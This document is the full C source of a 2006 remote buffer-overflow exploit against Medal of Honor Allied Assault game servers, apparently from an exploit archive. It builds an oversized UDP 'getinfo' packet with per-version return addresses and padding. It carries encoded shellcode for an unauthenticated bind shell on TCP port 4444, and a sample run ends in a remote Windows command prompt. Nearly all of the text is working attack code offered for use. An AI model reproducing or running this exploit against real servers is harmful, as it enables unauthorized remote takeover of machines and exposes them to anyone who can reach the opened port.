Medal of Honor (getinfo) Remote Buffer Overflow Exploit
来源:runningbon@gmail.com 作者:RunningBon 发布时间:2006-05-11  

/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon

Please use this responsibly, as I am not responsible for any damage you cause by using it. Note that the payload is an unauthenticated bind shell on TCP port 4444: once it is running, anyone who can reach the target can connect to it, not only the person who sent the packet.

IRC: irc.rizon.net #kik
E-mail: runningbon@gmail.com

Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)

Example:

C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.

C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/*
 * Parameters for one supported server build. Versions[] holds one entry per
 * build; main() picks an entry by pName and Exploit() reads the other two
 * fields verbatim when it assembles the packet.
 */
struct VersionStruct {
char *pName;          // version string accepted on the command line (matched case-insensitively in main)
DWORD dwNewEIP;       // 4 bytes appended after the padding, copied as-is (host byte order); presumably lands on the saved return address - TODO confirm against the target binary
DWORD dwFillLength;   // number of 'z' padding bytes placed between the "getinfo " header and dwNewEIP
};

/*
 * Per-build parameters consumed by Exploit(): the command-line name, the
 * DWORD written after the padding, and the padding length. Each row is
 * braced so it reads as one struct. Both numeric fields are copied into
 * the packet unchanged, so they are tied to one specific binary and must
 * be re-derived for any other build rather than guessed.
 */
VersionStruct Versions[] = {
    { "MOHAA-v1.11",   0xCBB935, 516 },
    { "MOHAA:S-v2.15", 0x923575, 516 },
    // TODO: MOHAA:Breakthrough entry (address and padding not determined yet)
};

#pragma comment (lib, "ws2_32.lib")

//Port 4444 bindshell
// NOTE(review): opaque, author-supplied payload - nothing in this file decodes,
// checks or constrains it. The leading bytes (sub ecx,ecx / sub ecx,-0x50 /
// fldz / fnstenv [esp-0xc] / pop ebx / xor [ebx+0x13],imm32 / loop) look like a
// Metasploit-style fnstenv XOR decoder stub wrapped around an encoded body;
// confirm by disassembling before relying on what it does. A bind shell on
// 4444 is reachable by anyone who can route to the target. sizeof() of this
// array includes the trailing NUL, and Exploit() sends that byte as well.
unsigned char szShellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
"\x11\x13\x38\x7e\x92\xec\xee\x81";

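/*
 * Report a fatal error and terminate the process.
 *
 * The message goes to stderr so it is not interleaved with the progress
 * lines on stdout, and the exit status is non-zero so anything driving
 * this tool from a script can distinguish a failed run from a successful
 * one. Never returns; the `return 0;` statements that follow Error() calls
 * elsewhere in this file are unreachable and kept only for readability.
 *
 * pString: message to print after the "[ERROR] " prefix.
 */
void Error(char *pString)
{
    fprintf(stderr, "[ERROR] %s\n", pString);
    ExitProcess(1);
}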

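/*
 * Build the oversized "getinfo" request described by pVersion and send it
 * to pIP:iPort as a single UDP datagram.
 *
 * Packet layout, in the order it is assembled below:
 *   "\xff\xff\xff\xff\x02getinfo "  - connectionless-packet prefix + command
 *   dwFillLength bytes of 'z'       - padding up to the overwritten control value
 *   dwNewEIP                        - 4 bytes copied as-is (host byte order, i.e.
 *                                     little-endian on x86); presumably lands on
 *                                     the saved return address
 *   szShellcode                     - payload, including its trailing NUL
 *
 * pIP:      dotted-quad IPv4 address of the target (inet_addr() syntax).
 * iPort:    UDP port of the game server.
 * pVersion: table entry selected by main(); its two numeric fields are used
 *           verbatim, so an entry that does not match the target build just
 *           crashes or does nothing.
 *
 * Fatal errors go through Error(), which terminates the process. Returns 1
 * once sendto() has accepted the datagram; UDP gives no delivery report, so
 * a 1 says nothing about whether the target was actually affected.
 */
int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
    WSAData WSADATA;
    SOCKET Socket = INVALID_SOCKET;
    sockaddr_in SockAddr;
    char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
    char szBuffer[4096];
    size_t iLen = 0;
    const size_t headerLen = sizeof(szHeader) - 1;   /* drop the string's NUL */

    /* The table entry decides how much we write; refuse one that would run
       past szBuffer instead of smashing this process's own stack. */
    if(pVersion->dwFillLength > sizeof(szBuffer) - headerLen - sizeof(DWORD) - sizeof(szShellcode))
    {
        Error("dwFillLength too large for the packet buffer.");
        return 0;
    }

    if(WSAStartup(MAKEWORD(1, 1), &WSADATA) != 0)
    {
        Error("WSAStartup()");
        return 0;
    }

    /* socket() signals failure with INVALID_SOCKET; SOCKET_ERROR is the
       sentinel for the int-returning Winsock calls such as sendto(). */
    Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(Socket == INVALID_SOCKET)
    {
        WSACleanup();
        Error("socket()");
        return 0;
    }

    memset(&SockAddr, 0, sizeof(SockAddr));
    SockAddr.sin_family = AF_INET;
    SockAddr.sin_port = htons((u_short)iPort);
    SockAddr.sin_addr.s_addr = inet_addr(pIP);
    /* inet_addr() returns INADDR_NONE for anything that is not a dotted quad
       (and for 255.255.255.255, which is not a sensible target here anyway);
       without this check a typo would send the packet to 255.255.255.255. */
    if(SockAddr.sin_addr.s_addr == INADDR_NONE)
    {
        closesocket(Socket);
        WSACleanup();
        Error("Invalid IP address; a dotted-quad IPv4 address is required.");
        return 0;
    }

    printf("Building packet.\n");

    memset(szBuffer, 0, sizeof(szBuffer));

    memcpy(szBuffer, szHeader, headerLen);
    iLen += headerLen;

    memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
    iLen += pVersion->dwFillLength;

    /* Raw copy of the DWORD: no byte swapping, matching the x86 target. */
    memcpy(szBuffer + iLen, &pVersion->dwNewEIP, sizeof(DWORD));
    iLen += sizeof(DWORD);

    /* sizeof() counts the array's terminating NUL; it is sent as well. */
    memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
    iLen += sizeof(szShellcode);

    printf("Sending packet.\n");

    if(sendto(Socket, szBuffer, (int)iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
    {
        closesocket(Socket);
        WSACleanup();
        Error("sendto()");
        return 0;
    }

    printf("Packet sent.\n");

    /* Release the socket and Winsock state the original left dangling. */
    closesocket(Socket);
    WSACleanup();

    return 1;
}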

/*
 * Write the tool banner (title, author and contact lines, then a blank
 * line) to stdout. Takes no arguments and returns nothing.
 */
void PrintWelcome()
{
    static const char szBanner[] =
        "MoHAA Server Buffer overflow exploit\n"
        "Written by RunningBon\n"
        "E-Mail: runningbon@gmail.com\n"
        "IRC: irc.rizon.net #kik\n"
        "\n";

    fputs(szBanner, stdout);
}

/*
 * Print the command-line synopsis followed by every entry of Versions[],
 * one name per line, so the user can see which <Version Name> values
 * main() will accept.
 *
 * pPath: program name to show in the synopsis (normally argv[0]).
 */
void PrintUsage(char *pPath)
{
    const size_t nVersions = sizeof(Versions) / sizeof(Versions[0]);
    size_t idx;

    printf("Usage: %s <IP> <Port> <Version Name>\n\n", pPath);
    printf("Supported Version List:\n");

    for(idx = 0; idx < nVersions; idx++)
    {
        printf("%s\n", Versions[idx].pName);
    }
}

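/*
 * Entry point: MOHAAExploit.exe <IP> <Port> <Version Name>
 *
 * Prints the banner, validates the port, looks <Version Name> up in
 * Versions[] (case-insensitive) and hands everything to Exploit(). Fatal
 * problems are reported through Error(), which terminates the process.
 * Returns 0 in every case that reaches the end, including the usage path.
 */
int main(int argc, char **argv)
{
    VersionStruct *pVersion = NULL;
    char *pEnd = NULL;
    long lPort = 0;

    PrintWelcome();

    if(argc < 4)
    {
        PrintUsage(argv[0]);
        return 0;
    }

    /* strtol rather than atoi so "12203x" or "abc" is rejected instead of
       silently becoming 12203 or 0; the range check keeps htons() honest. */
    lPort = strtol(argv[2], &pEnd, 10);
    if(pEnd == argv[2] || *pEnd != '\0' || lPort < 1 || lPort > 65535)
    {
        Error("Invalid port (expected 1-65535).");
    }

    for(size_t i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
    {
        if(!stricmp(argv[3], Versions[i].pName))
        {
            pVersion = &Versions[i];
            break;
        }
    }

    if(pVersion == NULL)
    {
        Error("Invalid version.");
    }

    printf("Attempting to exploit %s:%ld, running version %s.\n", argv[1], lPort, pVersion->pName);

    if(Exploit(argv[1], (int)lPort, pVersion))
    {
        /* Reminder only: nothing here verifies that the payload actually ran. */
        printf("Check for your shell on port 4444.\n");
    }

    return 0;
}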



 